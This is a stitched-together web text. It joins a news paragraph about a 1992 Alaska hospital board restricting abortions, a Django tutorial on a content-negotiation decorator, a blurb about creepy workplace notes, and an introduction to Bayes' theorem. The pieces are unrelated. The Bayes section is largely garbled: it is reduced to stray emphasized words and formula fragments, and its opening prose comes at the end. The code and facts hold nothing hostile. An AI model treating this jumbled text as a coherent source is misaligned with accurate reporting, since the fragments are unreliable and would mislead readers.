In 1992 , a coalition of some 20 evangelical churches in Alaska ’s Matanuska - Susitna Valley  including the Wasilla Assembly of God Church , where Ms. Palin was baptized at age 12  captured control of the operating board of the community ’s Valley Hospital .
The new board promptly voted to bar doctors from performing abortions at the hospital with limited exceptions for cases of rape , incest , dire medical necessity or where a doctor documents “ the fetus has a condition that is incompatible with life . ”
The policy change left Alaska without any hospital where a woman with , say , a negative amniocenteses result or other problem not included among the exceptions could obtain a second trimester abortion at a doctor ’s discretion .
Such procedures account for about 10 percent of all abortions .
Another take on content negotiation
Today my co-worker Daniel posted a class which performs content negotiation for Django views , allowing you to write a single view which returns any of several types of responses ( e.g. , HTML , JSON , XML ) according to the incoming HTTP Accept header .
While it ’s certainly cool , he notes a couple of issues with it ( including the redundancy it introduces in URL configuration ) .
So let ’s see if we ca n’t come up with a way to work around this .
Holiday decorations
It seems that the best way to approach this is to avoid the need to do too much rewriting in the view and URL code ; it ’d be nice to simply say , after the fact , what types of responses the view should be able to return without changing the view too much or tweaking the URL configuration over and over .
And the natural way to do this in Python is with a decorator , so the goal here should be to write a class which generates decorators which handle the content negotiation .
And while we ’re at it , let ’s cut down on some of the repetition by allowing the class to take the set of content types and template names only once , and then reuse them .
Ideally , we ’ll end up with something which would work like this :
xml_or_html = MultiResponse ( { ' text / html ' : ' hello.html ' , ' application/xml ' : ' hello.xml ' } ) @xml_or_html def hello ( request ) : return { ' message ' : ' Hello , world ! ' }
The hello view would then , when called , use the hello. html template and return a Content - Type of text / html if the Accept header states a preference for it , or use the hello.xml and return a Content - Type of application / xml if the client ’s Accept header prefers that .
The only real difference in the way the view is written is that it does n’t directly return an HttpResponse ; instead it returns a dictionary , and our decorator will deal with the problem of turning that dictionary into a template context , rendering the template and returning the response .
So let ’s get started on the code .
A decorator generator
We ’re going to end up defining a class named MultiResponse , whose instances will be able to act as decorators .
The first part of this is easy ; we ’ll just define the class and give it an __init__ method which takes a dictionary mapping content types to template names :
class MultiResponse ( object ) : def __init__ ( self , template_mapping ) : self .
template_mapping = template_mapping
Now we need to make sure instances of MultiResponse can be used as decorators .
A Python decorator is normally described as a function which takes another function as an argument , and returns yet another function ( whose behavior is slightly different ) , but in reality the “ functions ” involved can be any callable Python objects , and it ’s easy to make practically anything in Python callable .
Generally speaking , in Python some_function ( some_argument ) is syntactic sugar for some_function.__call__(some_argument ) , so defining a method named __call__ on our class will make it callable .
Let ’s start with just that :
class MultiResponse ( object ) : def __init__ ( self , template_mapping ) : self .
template_mapping = template_mapping def __call__ ( self ) : pass
Now , what we actually want to do is pass some other callable — a view function — to __call__ ( ) in order to decorate that view , so the argument signature actually should be :
def __call__ ( self , view_func ) : pass
And then to actually decorate the view , we need to define a new function which calls the view ( which in this case will return a dictionary instead of an HttpResponse ) , then chooses a template , renders a response of the appropriate Content - Type using that template and finally returns the response .
We can start on that by defining the new function , setting it up with an appropriate argument signature ( it needs to accept an HttpRequest and then any number or positional or keyword arguments , since we do n’t know what additional arguments the view is expecting ) , and call the view with those arguments to get the dictionary which will become the context :
class MultiResponse ( object ) : def __init__ ( self , template_mapping ) : self .
template_mapping = template_mapping def __call__ ( self , view_func ) : def wrapper ( request , * args , ** kwargs ) : context_dictionary = view_func ( request , * args , ** kwargs )
( remember that in Python , the * and ** syntax allow a function to receive , and then pass on , any combination of positional and / or keyword arguments )
Now we need to figure out which template and Content - Type to use , based on the request ’s Accept header .
That header will be in request .
META [‘ HTTP_ACCEPT ’] and will consist of one or more content types ( and optional “ quality ” parameters to state a preference for one type or another ) separated by commas .
Daniel ’s original MultiResponse did some simple parsing to figure this out , but whenever I have to do content negotiation in Python I invariably use Joe Gregorio ’s mimeparse.py , which implements the HTTP specification ’s rules for determining which content type is “ preferred ” out of an Accept header .
The function we want from mimeparse is best_match ( ) , which takes a list of supported content types and an Accept header , and returns the best supported content type out of the available choices , so we can get the content type from that :
import mimeparse class MultiResponse ( object ) : def __init__ ( self , template_mapping ) : self .
template_mapping = template_mapping def __call__ ( self , view_func ) : def wrapper ( request , * args , ** kwargs ) : context_dictionary = view_func ( request , * args , ** kwargs ) content_type = mimeparse .
best_match ( self .
template_mapping . keys ( ) , request .
META [ ' HTTP_ACCEPT ' ])
This simply uses the keys in the template_mapping dictionary ( which , remember , will map content types to template names ) as the supported content types , and gets the best match out of them .
From there , we can use render_to_response to get an HttpResponse object by looking up the template name for the content type we ’re using and passing in the context dictionary obtained from the view :
import mimeparse from django . shortcuts import render_to_response class MultiResponse ( object ) : def __init__ ( self , template_mapping ) : self .
template_mapping = template_mapping def __call__ ( self , view_func ) : def wrapper ( request , * args , ** kwargs ) : context_dictionary = view_func ( request , * args , ** kwargs ) content_type = mimeparse .
best_match ( self .
template_mapping . keys ( ) , request .
META [ ' HTTP_ACCEPT ' ] ) response = render_to_response ( self .
template_mapping [ content_type ] , context_dictionary )
Finally , we can set the outgoing Content - Type header and return the response :
import mimeparse from django.conf import settings from django .
shortcuts import render_to_response class MultiResponse ( object ) : def __init__ ( self , template_mapping ) : self .
template_mapping = template_mapping def __call__ ( self , view_func ) : def wrapper ( request , * args , ** kwargs ) : context_dictionary = view_func ( request , * args , ** kwargs ) content_type = mimeparse .
best_match ( self .
template_mapping . keys ( ) , request .
META [ ' HTTP_ACCEPT ' ] ) response = render_to_response ( self .
template_mapping [ content_type ] , context_dictionary ) response [ ' Content - Type ' ] = " %s ; charset= %s " % ( content_type , settings .
DEFAULT_CHARSET
) return response
Note that the Content - Type header involves two parts : the actual content type , and the character set being used .
While you can omit the charset parameter , it ’s generally a bad idea to do so ( especially if you ’re working with XML — see Mark Pilgrim ’s “ XML on the Web has Failed ” for an excellent writeup of some of the issues ) .
The DEFAULT_CHARSET setting in Django provides the character set used by default for HTTP responses , so we just use that as the charset value .
Now we have the fully - defined function our decorator will need to produce , so __call__ ( ) can simply return it and we ’ll be done :
import mimeparse from django.conf import settings from django .
shortcuts import render_to_response class MultiResponse ( object ) : def __init__ ( self , template_mapping ) : self .
template_mapping = template_mapping def __call__ ( self , view_func ) : def wrapper ( request , * args , ** kwargs ) : context_dictionary = view_func ( request , * args , ** kwargs ) content_type = mimeparse .
best_match ( self .
template_mapping . keys ( ) , request .
META [ ' HTTP_ACCEPT ' ] ) response = render_to_response ( self .
template_mapping [ content_type ] , context_dictionary ) response [ ' Content - Type ' ] = " %s ; charset= %s " % ( content_type , settings .
DEFAULT_CHARSET
) return response return wrapper
Improving MultiResponse
At this point we ’ve met our original goal ; we could write view code like the example above , and it would work as expected :
xml_or_html = MultiResponse ( { ' text / html ' : ' hello.html ' , ' application/xml ' : ' hello.xml ' } ) @xml_or_html def hello ( request ) : return { ' message ' : ' Hello , world ! ' }
Or for one - off uses we could write it like so :
@MultiResponse ( { ' text / html ' : ' hello.html ' , ' application/xml ' : ' hello.xml ' } ) def hello ( request ) : return { ' message ' : ' Hello , world ! ' }
The hello view would , depending on the incoming Accept header , change change its template and the Content - Type of its response .
But with a couple of changes , our MultiResponse class can become a bit more useful :
It ’d be nice to give it the ability to use RequestContext to automatically populate common variables we always want to have .
Currently , the eventual decorated view function will lose its docstring , and Django ’s built - in admin documentation system wo n’t be able to show any useful information about it , because we ’ve thrown away all the original information about the view we ’re decorating .
The first improvement is easy enough ; we can simply use the context_instance argument of render_to_response , and have MultiResponse take an argument telling it whether to use RequestContext :
import mimeparse from django.conf import settings from django .
shortcuts import render_to_response from django.template import Context from django.template import RequestContext class MultiResponse ( object ) : def __init__ ( self , template_mapping , request_context = True ) : self .
template_mapping = template_mapping self .
request_context = request_context def __call__ ( self , view_func ) : def wrapper ( request , * args , ** kwargs ) : context_dictionary = view_func ( request , * args , ** kwargs ) context_instance = self .
request_context and RequestContext ( request ) or Context ( ) content_type = mimeparse .
best_match ( self .
template_mapping . keys ( ) , request .
META [ ' HTTP_ACCEPT ' ] ) response = render_to_response ( self .
template_mapping [ content_type ] , context_dictionary , context_instance = context_instance ) response [ ' Content - Type ' ] = " %s ; charset= %s " % ( content_type , settings .
DEFAULT_CHARSET
) return response return wrapper
The request_context argument to __init__ ( ) defaults to True , but allows this to be overridden when needed , and __call__ ( ) simply looks at that to determine what type of context to use .
Preserving information about the original view function , so that things like automatic documentation will continue to work , is a bit trickier because it involves fiddling with attributes of the decorated function that do n’t normally get fiddled with .
Fortunately , Python 2.5 introduced the functools module into the standard library , which contains ( among other things ) a function called update_wrapper ; given a function being returned in a decorator , and the original function being decorated , update_wrapper copies over things like the docstring to the new function .
And since this is generally useful ( and needed for things like Django ’s admin documentation ) , Django bundles a version of this function in django.utils.
functional , backported to work with Python 2.4 and Python 2.3 .
So we can try to import update_wrapper from the standard library and fall back to Django ’s copy if it ’s unavailable , then use it to copy over the original view function ’s attributes :
try : from functools import update_wrapper except ImportError : from django.utils.functional import update_wrapper import mimeparse from django.conf import settings from django .
shortcuts import render_to_response from django.template import Context from django.template import RequestContext class MultiResponse ( object ) : def __init__ ( self , template_mapping , request_context = True ) : self .
template_mapping = template_mapping self .
request_context = request_context def __call__ ( self , view_func ) : def wrapper ( request , * args , ** kwargs ) : context_dictionary = view_func ( request , * args , ** kwargs ) context_instance = self .
request_context and RequestContext ( request ) or Context ( ) content_type = mimeparse .
best_match ( self .
template_mapping . keys ( ) , request .
META [ ' HTTP_ACCEPT ' ] ) response = render_to_response ( self .
template_mapping [ content_type ] , context_dictionary , context_instance = context_instance ) response [ ' Content - Type ' ] = " %s ; charset= %s " % ( content_type , settings .
DEFAULT_CHARSET
) return response update_wrapper ( wrapper , view_func ) return wrapper
And we ’re done .
Our submitter , B. , was shopping at a shoe store in San Francisco when she realized she really needed to use the facilities .
Although there was no public restroom in sight , she did spy the familiar infographic just beyond a doorway marked “ employees only . ”
When she ducked inside , B. was greeted by this sublimely creepy warning from management [ ! ] .
Meanwhile , Chelsea ’s boss at the La Quinta in Perrysburg , Ohio managed to dial up the creepy just a smidge more .
Apparently disatisfied with the staff ’s response to her frequent written notes , the hotel manager brought in this doll — which chelsea says “ looked exactly like her ” — to do the job instead .
( Er , so to speak . )
related :
So many questions
Text size
An Intuitive Explanation of Bayes ' Theorem
Bayes '
Theorem
for the curious and bewildered ;
an excruciatingly gentle introduction .
This page has now been obsoleted by a vastly improved guide to Bayes 's Theorem , the Arbital Guide to Bayes 's Rule .
Please read that instead .
Seriously .
I mean it .
p( a|x )
p( x|a )
p(a ) * p( x|a )
counterintuitive .
intuitive
1 % of women at age forty who participate in routine screening have breast cancer .
80 % of women with breast cancer will get positive mammographies .
9.6 % of women without breast cancer will also get positive mammographies .
A woman in this age group had a positive mammography in a routine screening .
What is the probability that she actually has breast cancer ?
Calculator : Result :
10 out of 1000 women at age forty who participate in routine screening have breast cancer .
800 out of 1000 women with breast cancer will get positive mammographies .
96 out of 1000 women without breast cancer will also get positive mammographies .
If 1000 women in this age group undergo a routine screening , about what fraction of women with positive mammographies will actually have breast cancer ?
Calculator : Result :
100 out of 10,000 women at age forty who participate in routine screening have breast cancer .
80 of every 100 women with breast cancer will get a positive mammography .
950 out of 9,900 women without breast cancer will also get a positive mammography .
If 10,000 women in this age group undergo a routine screening , about what fraction of women with positive mammographies will actually have breast cancer ?
Calculator : Result :
Group 1 : 100 women with breast cancer .
breast cancer .
Group 2 : 9,900 women without breast cancer .
Group A : 80 women with breast cancer , and a positive mammography .
breast cancer , and a mammography .
Group B : 20 women with breast cancer , and a negative mammography .
breast cancer , and a mammography .
Group C : 950 women without breast cancer , and a positive mammography .
breast cancer , and a mammography .
Group D : 8,950 women without breast cancer , and a negative mammography .
Calculator : Result :
change
all
all three
increase
not
downward
positive
replace
slides
slides
replacing
Fun
Fact !
Q. What is the Bayesian Conspiracy ?
A. The Bayesian Conspiracy is a multinational , interdisciplinary , and shadowy group of scientists that controls publication , grants , tenure , and the illicit traffic in grad students .
The best way to be accepted into the Bayesian Conspiracy is to join the Campus Crusade for Bayes in high school or college , and gradually work your way up to the inner circles .
It is rumored that at the upper levels of the Bayesian Conspiracy exist nine silent figures known only as the Bayes Council .
without
Calculator : Result :
change
detect
already
without
not
not
because
do
less
without
Group 1 : 100 patients with breast cancer .
Group 2 : 9,900 patients without breast cancer .
Group A : 80 patients with breast cancer and a " positive " mammography * .
Group B : 20 patients with breast cancer and a " negative " mammography * .
Group C : 7920 patients without breast cancer and a " positive " mammography * .
Group D : 1980 patients without breast cancer and a " negative " mammography * .
Calculator : Result :
must
uncorrelated
must
Group 1 : 100 patients with breast cancer .
Group 2 : 9,900 patients without breast cancer .
Group A : 100 *M patients with breast cancer and a " positive " result .
Group B : 100 * ( 1 - M ) patients with breast cancer and a " negative " result .
Group C : 9,900 *M patients without breast cancer and a " positive " result .
Group D : 9,900 * ( 1 - M ) patients without breast cancer and a " negative " result .
Group 1 : Within some number of patients , a fraction P have breast cancer .
Group 2 : Within some number of patients , a fraction ( 1 - P ) do not have breast cancer .
without
Group A : P*M patients have breast cancer and a " positive " result .
Group B : P * ( 1 - M ) patients have breast cancer and a " negative " result .
Group C : ( 1 - P ) *M patients have no breast cancer and a " positive " result .
Group D : ( 1 - P ) * ( 1 - M ) patients have no breast cancer and a " negative " result .
prior probability .
conditional probabilities .
the priors
.
revised probability
posterior probability .
if the two conditional probabilities are equal , the posterior probability equals the prior probability .
Fun
Fact !
Q. How can I find the priors for a problem ?
A. Many commonly used priors are listed in the Handbook of Chemistry and Physics .
Q . Where do priors originally come from ?
A. Never ask that question .
Q. Uh huh .
Then where do scientists get their priors ?
A. Priors for scientific problems are established by annual vote of the AAAS .
In recent years the vote has become fractious and controversial , with widespread acrimony , factional polarization , and several outright assassinations .
This may be a front for infighting within the Bayes Council , or it may be that the disputants have too much spare time .
No one is really sure .
Q. I see .
And where does everyone else get their priors ?
A . They download their priors from Kazaa .
Q . What if the priors I want are n't available on Kazaa ?
A . There 's a small , cluttered antique shop in a back alley of San Francisco 's Chinatown .
Do n't ask about the bronze rat .
But just in case ...
Result :
p( pearl ) = 40 %
p( blue|pearl ) = 30 %
p( blue|~pearl ) = 10 %
p( pearl|blue ) = ?
" ~ "
~pearl
blue|pearl
blue|pearl
<-
< d|c>< c|b>< b|a >
" | "
" | "
blue|pearl
blue|pearl
already know
premise ,
implication
conclusion .
p( blue|pearl ) = 30 %
already know
conclude
p( pearl|blue )
differential pressure
p( blue|pearl )
p( blue| ~pearl )
slides
p( pearl )
p( pearl|blue )
not
direction .
up
from
pearl
~pearl
replacing
replace
slides
sliding
is .
The Number Sense .
least
natural frequencies
natural frequencies
would
want
want
natural frequencies
selective attrition
proportion
blue|pearl
differential
why
30 % of eggs are painted blue ,
Fun
Fact !
Q. Why did the Bayesian reasoner cross the road ?
A . You need more information to answer this question .
requiring
eliminates
p( A ) >= p( A&B )
within
only
none
definitely
positive
named
meaning
strong
weak
negative
could
without
with
probability
probability
know
expected revised probability
p( cancer|positive ) * p( positive )
p( cancer|negative ) * p( negative ) = 7.8%* 10.3 % + 0.22%*89.7 % = 1 % = p( cancer )
Calculator : Result :
p( cancer ) : 0.01
Group 1 : 100 women with breast cancer p( ~cancer ) : 0.99
Group 2 : 9900 women without breast cancer
p( positive|cancer ) : 80.0 %
80 % of women with breast cancer have positive mammographies p( ~positive|cancer ) : 20.0 %
20 % of women with breast cancer have negative mammographies p( positive| ~cancer ) : 9.6 %
9.6 % of women without breast cancer have positive mammographies p( ~positive| ~cancer ) : 90.4 %
90.4 % of women without breast cancer have negative mammographies
p( cancer&positive ) : 0.008
Group A : 80 women with breast cancer and positive mammographies p( cancer&~positive ) : 0.002
Group B : 20 women with breast cancer and negative mammographies p( ~cancer&positive ) : 0.095
Group C : 950 women without breast cancer and positive mammographies p( ~cancer&~positive ) : 0.895
Group D : 8950 women without breast cancer and negative mammographies
p( positive ) : 0.103
1030 women with positive results p( ~positive ) : 0.897
8970 women with negative results
p( cancer|positive ) : 7.80 %
Chance you have breast cancer if mammography is positive : 7.8 % p(~cancer|positive ) : 92.20 %
Chance you are healthy if mammography is positive : 92.2 % p(cancer|~positive ) : 0.22 %
Chance you have breast cancer if mammography is negative : 0.22 % p(~cancer|~positive ) : 99.78 %
Chance you are healthy if mammography is negative : 99.78 %
p( A&B )
p( B&A )
p( A|B )
p( B|A )
p( A&B )
p( A|B )
" | "
p( cancer )
p( ~cancer )
p( A ) + p( ~A ) = 1
p( ~cancer ) = .99
p( cancer ) = 1 - p( ~cancer ) = .01
p( ~cancer ) = .99
p( cancer ) = .25
p( A ) + p( ~A ) = 1
p( positive|cancer )
p( ~positive|cancer )
p( positive|cancer )
p( positive| ~cancer )
two
p( positive&cancer )
p( positive|cancer )
p( cancer )
p( positive&cancer ) = p( positive|cancer ) * p( cancer )
and
p( cancer )
p( positive|cancer )
p( positive&cancer )
p( positive|cancer ) = p( positive&cancer ) / p( cancer )
and
p( positive&cancer )
p( positive|cancer )
p( positive )
p( positive&cancer )
p( positive& ~cancer )
p( positive ) = p( positive&cancer ) + p( positive& ~cancer )
p( positive )
and
no
p( A&B ) + p( A&~B ) = p( A )
p( A&B ) + p( ~A&B ) = p( B )
p( positive&cancer )
p( positive& ~cancer )
p( ~positive&cancer )
p( ~positive& ~cancer )
p( positive& ~cancer )
p( positive ) * p( ~cancer )
p( positive )
p( cancer )
p( positive& ~cancer ) = p( positive ) * p( ~cancer )
statistically independent
probabilities ,
fractions
p( positive&cancer ) +
p( positive& ~cancer ) +
p( ~positive&cancer ) +
p( ~positive& ~cancer ) = 1
fractions
p( cancer ) = A + B
p( ~positive|cancer ) = B / ( A + B )
three
any
p( blue ) = 0.40
p( blue|pearl ) = 5/13
p( ~blue& ~pearl ) = 0.20
can
p( pearl|blue )
Calculator : Result :
p( ~pearl|~blue ) / p( pearl )
that
p( cancer|positive ) * p( positive )
+ p(cancer|~positive ) *p( ~positive )
= p(cancer )
p( cancer|positive ) = A / ( A + C )
p( positive ) = A + C
p( cancer&positive ) = A
p( cancer|~positive ) = B / ( B + D )
p( ~positive ) = B + D
p( cancer&~positive ) = B
p( cancer ) = A + B
p( pearl|blue )
remains the same ,
1 % of women have breast cancer . 80 % of women with breast cancer get positive mammographies .
9.6 % of women without breast cancer get positive mammographies .
If a woman has a positive mammography , what is the probability she has breast cancer ?
Suppose there are two barrels containing many small plastic eggs .
In both barrels , some eggs are painted blue and the rest are painted red .
In both barrels , 40 % of the eggs contain pearls and the rest are empty .
In the first barrel , 30 % of the pearl eggs are painted blue , and 10 % of the empty eggs are painted blue .
In the second barrel , 60 % of the pearl eggs are painted blue , and 20 % of the empty eggs are painted blue .
Would you rather have a blue egg from the first or second barrel ?
intuitively obvious
p( pearl ) = P
p( blue|pearl ) = M*X
p( blue| ~pearl ) = N*X
p( pearl|blue ) = ?
Group A : p( pearl&blue ) = P*M*X
Group B : p( pearl&~blue ) = P*( 1 - ( M* X ) )
Group C : p( ~pearl&blue ) = ( 1 - P ) *N*X
Group D : p( ~pearl&~blue ) = ( 1 - P ) *( 1 - ( N*X ) )
P*M*X / ( P* M* X + ( 1 - P ) * N*X )
Fun
Fact !
Q. Suppose that there are two barrels , each containing a number of plastic eggs .
In both barrels , some eggs are painted blue and the rest are painted red .
In the first barrel , 90 % of the eggs contain pearls and 20 % of the pearl eggs are painted blue .
In the second barrel , 45 % of the eggs contain pearls and 60 % of the empty eggs are painted red .
Would you rather have a blue pearl egg from the first or second barrel ?
A. Actually , it does n't matter which barrel you choose !
Can you see why ?
The probability that a test gives a true positive
the probability that a test gives a false positive
likelihood ratio
meaning
positive
negative
p( pearl|blue )
p( pearl|~blue )
not
Suppose that there are two barrels , each containing a number of plastic eggs .
In both barrels , 40 % of the eggs contain pearls and the rest contain nothing .
In both barrels , some eggs are painted blue and the rest are painted red .
In the first barrel , 30 % of the eggs with pearls are painted blue , and 10 % of the empty eggs are painted blue .
In the second barrel , 90 % of the eggs with pearls are painted blue , and 30 % of the empty eggs are painted blue .
Would you rather have a blue egg from the first or second barrel ?
Would you rather have a red egg from the first or second barrel ?
do
Calculator : Result :
p( pearl|blue )
p( pearl|~blue )
p( pearl )
p( pearl|blue ) * p( blue ) + p( pearl|~blue ) * p( ~blue ) = p( pearl )
p( blue )
red
do
meaning
positive
proportions
size
p( blue )
p( pearl|blue )
p( pearl&blue )
p( ~pearl&blue )
p( ~blue )
p( pearl&~blue )
p( ~pearl&~blue )
not
can't
two
independent
and
Calculator : Result :
Calculator : Result :
Calculator : Result :
and
Calculator : Result :
probability
odds ratio ,
1:99
8.33:1 = 25:3
18.0:1 = 18:1
3.5:1 = 7:2
odds
1*25*18*7:99*3*1*2 =
3,150:594
3,150 / ( 3,150 + 594 ) = 84 %
decibels = 10 log 10 ( intensity )
or
intensity = 10 ( decibels / 10 )
could
10 log 10 ( 1/99 ) = - 20
10 log 10 ( 25/3 ) = 9
10 log 10 ( 18/1 ) = 13
10 log 10 ( 7/2 ) = 5
In front of you is a bookbag containing 1,000 poker chips .
I started out with two such bookbags , one containing 700 red and 300 blue chips , the other containing 300 red and 700 blue .
I flipped a fair coin to determine which bookbag to use , so your prior probability that the bookbag in front of you is the red bookbag is 50 % .
Now , you sample randomly , with replacement after each chip .
In 12 samples , you get 8 reds and 4 blues .
What is the probability that this is the predominantly red bag ?
ratio
excess
more
7
:3
= 2401:81
intuitively
You are a mechanic for gizmos .
When a gizmo stops working , it is due to a blocked hose 30 % of the time .
If a gizmo's hose is blocked , there is a 45 % probability that prodding the gizmo will produce sparks .
If a gizmo's hose is unblocked , there is only a 5 % chance that prodding the gizmo will produce sparks .
A customer brings you a malfunctioning gizmo .
You prod the gizmo and find that it produces sparks .
What is the probability that a spark - producing gizmo has a blocked hose ?
Calculator : Result :
p( positive|cancer ) * p( cancer )
_______________________________________________
p( positive|cancer ) * p( cancer ) + p( positive| ~cancer ) * p( ~cancer )
which is
p( positive&cancer ) / [ p( positive&cancer ) + p( positive& ~cancer ) ]
which is
p( positive&cancer ) / p( positive )
which is
p( cancer|positive )
Bayes '
Theorem
Bayes ' Rule :
p( A|X ) = p( X|A ) * p( A )
p( X|A ) * p( A ) + p( X|~A ) * p( ~A )
update
new evidence
entirely succeeded
Fun
Fact !
Q. Who originally discovered Bayes ' Theorem ?
A. The Reverend Thomas Bayes , by far the most enigmatic figure in mathematical history .
Almost nothing is known of Bayes 's life , and very few of his manuscripts survived .
Thomas Bayes was born in 1701 or 1702 to Joshua Bayes and Ann Carpenter , and his date of death is listed as 1761 .
The exact date of Thomas Bayes 's birth is not known for certain because Joshua Bayes , though a surprisingly wealthy man , was a member of an unusual , esoteric , and even heretical religious sect , the " Nonconformists " .
The Nonconformists kept their birth registers secret , supposedly from fear of religious discrimination ; whatever the reason , no true record exists of Thomas Bayes 's birth .
Thomas Bayes was raised a Nonconformist and was soon promoted into the higher ranks of the Nonconformist theosophers , whence comes the " Reverend " in his name .
In 1742 Bayes was elected a Fellow of the Royal Society of London , the most prestigious scientific body of its day , despite Bayes having published no scientific or mathematical works at that time .
Bayes 's nomination certificate was signed by sponsors including the President and the Secretary of the Society , making his election almost certain .
Even today , however , it remains a mystery why such weighty names sponsored an unknown into the Royal Society .
Bayes 's sole publication during his known lifetime was allegedly a mystical book entitled Divine Benevolence , laying forth the original causation and ultimate purpose of the universe .
The book is commonly attributed to Bayes , though it is said that no author appeared on the title page , and the entire work is sometimes considered to be of dubious provenance .
Most mysterious of all , Bayes '
Theorem itself appears in a Bayes manuscript presented to the Royal Society of London in 1764 , three years after Bayes 's supposed death in 1761 !
Despite the shocking circumstances of its presentation , Bayes ' Theorem was soon forgotten , and was popularized within the scientific community only by the later efforts of the great mathematician Pierre - Simon Laplace .
Laplace himself is almost as enigmatic as Bayes ; we do n't even know whether it was " Pierre " or " Simon " that was his actual first name .
Laplace 's papers are said to have contained a design for an AI capable of predicting all future events , the so - called " Laplacian superintelligence " .
While it is generally believed that Laplace never tried to implement his design , there remains the fact that Laplace presciently fled the guillotine that claimed many of his colleagues during the Reign of Terror .
Even today , physicists sometimes attribute unusual effects to a " Laplacian Operator " intervening in their experiments .
In summary , we do not know the real circumstances of Bayes 's birth , the ultimate origins of Bayes ' Theorem , Bayes 's actual year of death , or even whether Bayes ever really died .
Nonetheless " Reverend Thomas Bayes " , whatever his true identity , has the greatest fondness and gratitude of Earth 's scientific community .
excited
exactly
discomforting ;
p( X|A )
p( X|~A )
p( A|X ) = p( A )
any
but
strength
when
how much
Bayesian method
Bayesian reasoners
Bayesian reasoner
rational mind .
do not take prior frequencies sufficiently into account ,
would n't
- p(wetgrass|rain ) ~ 1
p( wetgrass|~rain )
p( rain|wetgrass )
never
always
p(rain|wetgrass ) ~ 1
p( wetgrass|rain ) = 50 %
differential
Strong
low
not -
A
Bayesian revolution in the sciences
science itself is a special case of Bayes ' Theorem ; experimental evidence is Bayesian evidence .
falsificationism
p( X|A ) ~ 1
p( X|A ) ~ 1
p( X|B ) ~ 1
p( X|A ) ~ 1
p( X|~A ) ~ 0
p( X|A ) / p( X|~A )
how strong
p( X|~A )
confirmatory
not
enormously
against
p( Y|A )
p( Y|A )
p( Y|~A )
p( Y|A ) / p( Y| ~A )
p( Y|A )
very small ,
p( Y| ~A ) / p( Y|A )
very large ,
very strong
low
not -
A
must
only
no such thing
very strong
Fun
Fact !
Q. Are there any limits to the power of Bayes ' Theorem ?
A. According to legend , one who fully grasped Bayes '
Theorem would gain the ability to create and physically enter an alternate universe using only off - the - shelf equipment and a short computer program .
One who fully grasps Bayes '
Theorem , yet remains in our universe to aid others , is known as a Bayesattva .
p( A|X ) = p( X|A ) * p( A )
p( X|A ) * p( A ) + p( X|~A ) * p( ~A )
poorly grounded mental rules ;
one more thing to juggle mentally ,
p( X|A )
p( A|X )
p( X|A )
without
equation
graph .
p( A|X ) = p( X|A ) * p( A )
p( X|A ) * p( A ) + p( X|~A ) * p( ~A )
p( Q<-P )
all things ;
all women .
group of all women .
entire sample ,
probability
all things that have P ;
all women with positive mammographies .
p( Q|P )
p( Q& P|P )
know
investigating
given ;
given ,
relative to the group P .
old
given ,
given ,
right
not
update
given
implies
observation
evidence ,
p( A|X ) = p( A|X )
p( A|X ) = p( X& A )
p ( X )
p( A|X ) = p( X&A )
p( X& A ) + p( X&~A ) p( A|X ) = p( X|A ) * p( A )
p( X|A ) * p( A ) + p( X|~A ) * p( ~A )
p( A|X )
p( X&A ) / p( X )
p( A|X )
p( X&A ) / p( X )
p( cancer|positive )
( positive&cancer ) / ( positive )
p(X )
p( X&A ) + p( X&~A )
p( X&A )
p( X&~A )
p( X&A )
[ p( X&A ) + p( X&~A ) ]
add
flowers
within
all
healthy
p( X&A )
p( X|A ) * p( A )
p( X&~A )
p( X|~A ) * p( ~A )
know ;
causal relations ,
statistical relations .
statistical implication
direct
causal relation ;
because
designed
simple
elementary
p( X|A )
p( X|~A )
p( A|X )
consistently
causal relations
steps in reasoning
inferential
p( cancer|positive )
causal
p( positive|cancer )
p( positive| ~cancer )
Your friends and colleagues are talking about something called " Bayes ' Theorem " or " Bayes ' Rule " , or something called Bayesian reasoning .
They sound really enthusiastic about it , too , so you google and find a webpage about Bayes ' Theorem and ... It 's this equation .
That 's all .
Just one equation .
The page you found gives a definition of it , but it does n't say what it is , or why it 's useful , or why your friends would be interested in it .
It looks like this random statistics thing .
So you came here .
Maybe you do n't understand what the equation says .
Maybe you understand it in theory , but every time you try to apply it in practice you get mixed up trying to remember the difference betweenand , and whetherbelongs in the numerator or the denominator .
Maybe you see the theorem , and you understand the theorem , and you can use the theorem , but you can't understand why your friends and / or research colleagues seem to think it 's the secret of the universe .
Maybe your friends are all wearing Bayes '
Theorem T - shirts , and you 're feeling left out .
Maybe you 're a girl looking for a boyfriend , but the boy you 're interested in refuses to date anyone who " is n't Bayesian " .
What matters is that Bayes is cool , and if you do n't know Bayes , you are n't cool .
Why does a mathematical concept generate this strange enthusiasm in its students ?
What is the so - called Bayesian Revolution now sweeping through the sciences , which claims to subsume even the experimental method itself as a special case ?
What is the secret that the adherents of Bayes know ?
What is the light that they have seen ?
Soon you will know .
Soon you will be one of us .
While there are a few existing online explanations of Bayes '
Theorem , my experience with trying to introduce people to Bayesian reasoning is that the existing online explanations are too abstract .
Bayesian reasoning is veryPeople do not employ Bayesian reasoning intuitively , find it very difficult to learn Bayesian reasoning when tutored , and rapidly forget Bayesian methods once the tutoring is over .
This holds equally true for novice students and highly trained professionals in a field .
Bayesian reasoning is apparently one of those things which , like quantum mechanics or the Wason Selection Test , is inherently difficult for humans to grasp with our built - in mental faculties .
Or so they claim .
Here you will find an attempt to offer anexplanation of Bayesian reasoning - an excruciatingly gentle introduction that invokes all the human ways of grasping numbers , from natural frequencies to spatial visualization .
The intent is to convey , not abstract rules for manipulating numbers , but what the numbers mean , and why the rules are what they are ( and cannot possibly be anything else ) .
When you are finished reading this page , you will see Bayesian problems in your dreams .
And let 's begin .
Here 's a story problem about a situation that doctors often encounter :
What do you think the answer is ?
If you have n't encountered this kind of problem before , please take a moment to come up with your own answer before continuing .
Next , suppose I told you that most doctors get the same wrong answer on this problem - usually , only around 15 % of doctors get it right .
( " Really ?
15 %?
Is that a real number , or an urban legend based on an Internet poll ? "
It 's a real number .
See Casscells , Schoenberger , and Grayboys 1978 ; Eddy 1982 ; Gigerenzer and Hoffrage 1995 ; and many other studies .
It 's a surprising result which is easy to replicate , so it 's been extensively replicated . )
Do you want to think about your answer again ?
Here 's a Javascript calculator if you need one .
This calculator has the usual precedence rules ; multiplication before addition and so on .
If you 're not sure , I suggest using parentheses .
On the story problem above , most doctors estimate the probability to be between 70 % and 80 % , which is wildly incorrect .
Here 's an alternate version of the problem on which doctors fare somewhat better :
And finally , here 's the problem on which doctors fare best of all , with 46 % - nearly half - arriving at the correct answer :
The correct answer is 7.8 % , obtained as follows :
